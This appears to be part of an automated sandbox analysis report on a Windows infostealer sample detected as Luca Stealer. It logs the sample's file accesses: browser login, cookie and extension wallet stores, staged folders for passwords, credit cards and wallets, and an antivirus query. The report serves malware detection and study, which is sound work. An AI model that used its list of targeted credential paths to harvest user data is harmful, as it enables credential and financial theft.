            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\JDSOXXXWOA.docx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\JDSOXXXWOA.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\JDSOXXXWOA.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\MNULNCRIYC.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\MQAWXUYAIK.mp3 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\MQAWXUYAIK.pdf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\QVTVNIBKSD.jpg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\QVTVNIBKSD.jpg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\TQDGENUHWP.mp3 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\TTCBKWZYOC.jpg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\TTCBKWZYOC.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\TTCBKWZYOC.xlsx VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\Documents\XQACHMZIHU.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\sensitive-files.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Autofill VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Cookies VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\screen1.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\sensitive-files.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\sensitive-files.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\user_info.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\user_info.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Wallets VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Autofill VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Cookies VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\screen1.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\screen1.png VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\sensitive-files.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\History\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Downloads\Edge_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ElH8RbFR0BDrw2NuoORMGfljC7DDIp\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Luca Stealer
            Source: Yara matchFile source: 765iYbgWn9.exe, type: SAMPLE
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 0.0.765iYbgWn9.exe.7ff6a5820000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: Process Memory Space: 765iYbgWn9.exe PID: 1996, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\765iYbgWn9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
